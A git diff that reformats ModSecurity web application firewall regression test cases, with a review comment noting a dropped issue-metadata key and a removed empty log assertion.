"SecRule ARGS:foo \"@rx ^bar$\" \"id:100,phase:1,ctl:ruleRemoveById=200-1999\"", + "SecRule ARGS:z \"@rx ^xxx$\" \"id:1010,phase:1,deny,status:403\"" ] } ] diff --git a/test/test-cases/regression/issue-2196.json b/test/test-cases/regression/issue-2196.json index 44347bd08d..d04750367d 100644 --- a/test/test-cases/regression/issue-2196.json 
+++ b/test/test-cases/regression/issue-2196.json @@ -1,35 +1,41 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing audit log not written when nolog - issue-2196", - "expected":{ - "http_code":200 + "enabled": 1, + "version_min": 300000, + "title": "Testing audit log not written when nolog - issue-2196", + "client": { + "ip": "127.0.0.1", + "port": 123 }, - "client":{ - "ip":"127.0.0.1", - "port":123 + "server": { + "ip": "127.0.0.1", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"index.php?foo=bar&a=xxx", - "method":"GET", - "body": "" - }, - "expected": { - "http_code": 200, - "audit_log": "\\A[\\s\\S]{0}\\z" + "uri": "index.php?foo=bar&a=xxx", + "method": "GET", + "body": [ + "" + ] }, + "response": { + "headers": { - "server":{ - "ip":"127.0.0.1", - "port":80 + }, + "body": [ + "" + ] + }, + "expected": { + "audit_log": "\\A[\\s\\S]{0}\\z", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAuditLogParts ABIJDEFHZ", "SecAuditEngine RelevantOnly", diff --git a/test/test-cases/regression/issue-2296.json b/test/test-cases/regression/issue-2296.json index bc64d19bd2..95463dbbec 100644 --- a/test/test-cases/regression/issue-2296.json +++ b/test/test-cases/regression/issue-2296.json 
@@ -1,433 +1,452 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression (1/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression (1/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", "name1": "value1" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "http_code":200, - "debug_log":"Target value: \"is a simple test\"", - "error_log":"Operator `Rx' with parameter `test' against variable `ARGS:THIS'" + "expected": { + "debug_log": "Target value: \"is a simple test\"", + "error_log": "Operator `Rx' with parameter `test' against variable `ARGS:THIS'", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS:/^ThIs$/ \"test\" \"id:1\"" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS:/^ThIs$/ \"test\" \"id:1\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression (2/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression (2/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", "name1": "value1" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "http_code":200, - "debug_log":"Rule returned 0", - "error_log":"" + "expected": { + "debug_log": "Rule returned 0", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS:/^ThIz$/ \"test\" \"id:1,deny,status:302\"" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS:/^ThIz$/ \"test\" \"id:1,deny,status:302\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - msg (3/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - msg (3/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", "name1": "value1" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "http_code":200, - "debug_log":"Target value: \"is a simple test\"", - "error_log":"msg \"Testing is a simple test\"" + "expected": { + "debug_log": "Target value: \"is a simple test\"", + "error_log": "msg \"Testing is a simple test\"", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS:/^ThIs$/ \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}'\"" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS:/^ThIs$/ \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - matched_vars (4/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - matched_vars (4/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", "name1": "value1" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "http_code":200, - "debug_log":"Target value: \"is a simple test\"", - "error_log":"msg \"Testing is a simple test\"" + "expected": { + "debug_log": "Target value: \"is a simple test\"", + "error_log": "msg \"Testing is a simple test\"", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS:/^ThIs$/ \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}',chain\"", - "SecRule MATCHED_VARS:/thIs/ \"is a simple test\" \"log\"" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS:/^ThIs$/ \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}',chain\"", + "SecRule MATCHED_VARS:/thIs/ \"is a simple test\" \"log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - rule (5/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - rule (5/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", "name1": "value1" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "http_code":403, - "debug_log":"Target value: .1. .Variable: RULE:id.", - "error_log":"Operator `Rx' with parameter `1' against variable `RULE:id' .Value: `1' ." + "expected": { + "debug_log": "Target value: .1. .Variable: RULE:id.", + "error_log": "Operator `Rx' with parameter `1' against variable `RULE:id' .Value: `1' .", + "http_code": 403 }, - "rules":[ - "SecRuleEngine On", - "SecRule RULE:/^Id$/ \"1\" \"id:1,msg:'Testing %{RULE.id}% -- ',deny\"" + "rules": [ + "SecRuleEngine On", + "SecRule RULE:/^Id$/ \"1\" \"id:1,msg:'Testing %{RULE.id}% -- ',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - TX (6/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - TX (6/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", "name1": "value1" }, - "uri":"/", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "http_code":437, - "error_log":"`Within' with parameter `/name1/' against variable `TX:header_name_name1'" + "expected": { + "error_log": "`Within' with parameter `/name1/' against variable `TX:header_name_name1'", + "http_code": 437 }, - "rules":[ - "SecRuleEngine On", - "SecAction \"id:1,phase:1,setvar:'TX.restricted_headers=/name1/'\"", - "SecRule REQUEST_HEADERS_NAMES \"^.*$\" \"id:2,phase:2,setvar:'tx.header_name_%{tx.0}=/%{tx.0}/',deny,status:437,chain,capture\"", - "SecRule TX:/^header_name_/ \"@within %{TX:/esTrictEd_headers/}\" \"setvar:'tx.matched=1'\"" + "rules": [ + "SecRuleEngine On", + "SecAction \"id:1,phase:1,setvar:'TX.restricted_headers=/name1/'\"", + "SecRule REQUEST_HEADERS_NAMES \"^.*$\" \"id:2,phase:2,setvar:'tx.header_name_%{tx.0}=/%{tx.0}/',deny,status:437,chain,capture\"", + "SecRule TX:/^header_name_/ \"@within %{TX:/esTrictEd_headers/}\" \"setvar:'tx.matched=1'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - TX (7/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - TX (7/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", "name1": "value1" }, - "uri":"/", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + 
"headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":437, - "error_log":"`Within' with parameter `/name1/' against variable `TX:header_name_name1'" + "expected": { + "error_log": "`Within' with parameter `/name1/' against variable `TX:header_name_name1'", + "http_code": 437 }, - "rules":[ - "SecRuleEngine On", - "SecAction \"id:1,phase:1,setvar:'TX.restricted_headers=/name1/'\"", - "SecRule REQUEST_HEADERS_NAMES \"^.*$\" \"id:2,phase:2,setvar:'tx.header_name_%{tx.0}=/%{tx.0}/',deny,status:437,capture,chain\"", - "SecRule TX:/^HEADER_NAME_/ \"@within %{tx.restricted_headers}\" \"setvar:'tx.matched=1',log\"" + "rules": [ + "SecRuleEngine On", + "SecAction \"id:1,phase:1,setvar:'TX.restricted_headers=/name1/'\"", + "SecRule REQUEST_HEADERS_NAMES \"^.*$\" \"id:2,phase:2,setvar:'tx.header_name_%{tx.0}=/%{tx.0}/',deny,status:437,capture,chain\"", + "SecRule TX:/^HEADER_NAME_/ \"@within %{tx.restricted_headers}\" \"setvar:'tx.matched=1',log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - exclusion (8/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - exclusion (8/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", "name1": "value1" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ 
- "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}',deny,status:500,chain\"", - "SecRule MATCHED_VARS:/thIs/ \"is a simple test\" \"log\"", - "SecRuleUpdateTargetById 1 !ARGS:/ThIs/" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}',deny,status:500,chain\"", + "SecRule MATCHED_VARS:/thIs/ \"is a simple test\" \"log\"", + "SecRuleUpdateTargetById 1 !ARGS:/ThIs/" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - exclusion/ARGS (9/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - exclusion/ARGS (9/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", "name1": "value1" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": 
"/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS|!ARGS:/tHiS/ \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}',deny,status:500,chain\"", - "SecRule MATCHED_VARS:/thIs/ \"is a simple test\" \"log\"" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS|!ARGS:/tHiS/ \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}',deny,status:500,chain\"", + "SecRule MATCHED_VARS:/thIs/ \"is a simple test\" \"log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - exclusion/TX (10/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - exclusion/TX (10/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", "name1": "value1" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": 
"text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecAction \"phase:1,setvar:'tx.a=10'\"", - "SecRule TX|!TX:/a/ \"10\" \"id:10,deny,status:500\"" + "rules": [ + "SecRuleEngine On", + "SecAction \"phase:1,setvar:'tx.a=10'\"", + "SecRule TX|!TX:/a/ \"10\" \"id:10,deny,status:500\"" ] } ] diff --git a/test/test-cases/regression/issue-2423-msg-in-chain.json b/test/test-cases/regression/issue-2423-msg-in-chain.json index c667de0542..14b2fa42f6 100644 --- a/test/test-cases/regression/issue-2423-msg-in-chain.json +++ b/test/test-cases/regression/issue-2423-msg-in-chain.json 
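Review bot: All ten cases in issue-2296.json drop the misspelled `"gihub_issue": 2296` key instead of correcting it, while issue-2423-msg-in-chain.json keeps `"github_issue": 2423`; I would add `"github_issue": 2296,` after each `"url"` line so the issue metadata stays consistent across the regression files. Case 2/n also loses `"error_log":""` from `expected`. That is the negative case (`ARGS:/^ThIz$/` must not select `THIS`), so if the harness treats an empty pattern as match-anything nothing is lost, but that should be confirmed. A pattern asserting that rule id 1 logged nothing would make the case stronger than the `http_code` and `debug_log` checks alone.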
@@ -1,124 +1,168 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Test match variable (1/n)", + "enabled": 1, + "version_min": 300000, + "title": "Test match variable (1/n)", "github_issue": 2423, - "expected":{ - "http_code": 437, - "error_log": "against variable `REQUEST_HEADERS:Transfer-Encoding' .Value: `deflate'" + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", + "request": { + "headers": { + "Host": "localhost", "Transfer-Encoding": "deflate" }, - "uri":"/match-this", - "method":"GET" + "uri": "/match-this", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "error_log": "against variable `REQUEST_HEADERS:Transfer-Encoding' .Value: `deflate'", + "http_code": 437 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_URI \"^.*$\" \"phase:2,deny,capture,id:1,msg:'MatchedVar On Msg: [%{MATCHED_VAR}]',logdata:'MatchedVar On LogData %{MATCHED_VAR}',chain\"", "SecRule REQUEST_HEADERS \"^.*$\" \"status:437\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Test match variable (2/n)", + "enabled": 1, + "version_min": 300000, + "title": "Test match variable (2/n)", "github_issue": 2423, - "expected":{ - "http_code": 437, - "error_log": "MatchedVar On Msg: .deflate." 
+ "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", + "request": { + "headers": { + "Host": "localhost", "Transfer-Encoding": "deflate" }, - "uri":"/match-this", - "method":"GET" + "uri": "/match-this", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "error_log": "MatchedVar On Msg: .deflate.", + "http_code": 437 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_URI \"^.*$\" \"phase:2,deny,capture,id:1,msg:'MatchedVar On Msg: [%{MATCHED_VAR}]',logdata:'MatchedVar On LogData %{MATCHED_VAR}',chain\"", "SecRule REQUEST_HEADERS \"^.*$\" \"status:437\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Test match variable (3/n)", + "enabled": 1, + "version_min": 300000, + "title": "Test match variable (3/n)", "github_issue": 2423, - "expected":{ - "http_code": 437, - "error_log": "MatchedVar On LogData: deflate" + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", + "request": { + "headers": { + "Host": "localhost", "Transfer-Encoding": "deflate" }, - "uri":"/match-this", - "method":"GET" + "uri": "/match-this", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "error_log": "MatchedVar On LogData: deflate", + "http_code": 437 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_URI \"^.*$\" \"phase:2,deny,capture,id:1,msg:'MatchedVar On Msg: [%{MATCHED_VAR}]',logdata:'MatchedVar On LogData: %{MATCHED_VAR}',chain\"", "SecRule REQUEST_HEADERS \"^.*$\" \"status:437\"" ] }, { - 
"enabled":1, - "version_min":300000, - "title":"Test match variable (4/n)", + "enabled": 1, + "version_min": 300000, + "title": "Test match variable (4/n)", "github_issue": 2423, - "expected":{ - "http_code": 437, - "error_log": "msg \"Illegal header \\[/restricted/\\]\"" - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "Restricted":"attack", - "Other": "Value" + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "Restricted": "attack", + "Other": "Value" + }, + "uri": "/", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + }, - "uri":"/", - "method":"GET" + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "error_log": "msg \"Illegal header \\[/restricted/\\]\"", + "http_code": 437 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS_NAMES \"^.*$\" \"phase:2,setvar:'tx.header_name_%{TX.0}=/%{TX.0}/',deny,t:lowercase,capture,id:500065,msg:'Illegal header [%{MATCHED_VAR}]',logdata:'Restricted header detected: %{MATCHED_VAR}',chain\"", "SecRule TX:/^header_name_/ \"@within /name1/restricted/name3/\" \"status:437\"" diff --git a/test/test-cases/regression/issue-2427.json b/test/test-cases/regression/issue-2427.json index 6b734af65e..adbef0f113 100644 --- a/test/test-cases/regression/issue-2427.json +++ b/test/test-cases/regression/issue-2427.json 
@@ -1,29 +1,29 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Tmp file retained for @inspectFile (1/2)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Tmp file retained for @inspectFile (1/2)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", @@ -45,11 +45,19 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "debug_log":"Returning from lua script: abcdef.*Rule returned 1", - "http_code":403 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Returning from lua script: abcdef.*Rule returned 1", + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecTmpSaveUploadedFiles On", 
@@ -60,30 +68,30 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Tmp file retained for @inspectFile (2/2)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Tmp file retained for @inspectFile (2/2)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ 